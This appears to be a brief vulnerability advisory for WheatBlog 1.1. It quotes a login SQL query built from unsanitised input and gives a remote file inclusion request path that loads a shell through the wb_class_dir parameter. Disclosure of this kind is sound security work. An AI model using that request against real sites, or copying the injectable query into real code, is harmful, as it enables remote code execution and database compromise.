WheatBlog version 1.1 suffers from remote file inclusion and SQL injection vulnerabilities.
8e54fa6392e6f75205e7892c47600d9143739b7a26aa1230252f38e05d77f445
Found by E.Minaev (underwater@itdefence.ru)
ITDefence.ru
1) SQL Injection in login function. With help of this injection is possible to make per-symbol brute of tables names of blog's database (magic_quotes_gpc should be tured off).
------------------------------------------
"$sql = "select * from $tblUsers where login = '$login'";
if ( $login != $row['login'] ) $valid_user = 0;
if ( $password != $row['password'] ) $valid_user = 0;"
------------------------------------------
2) Remote File Inclusion (RFI)
/includes/sessions.php?wb_class_dir=shell?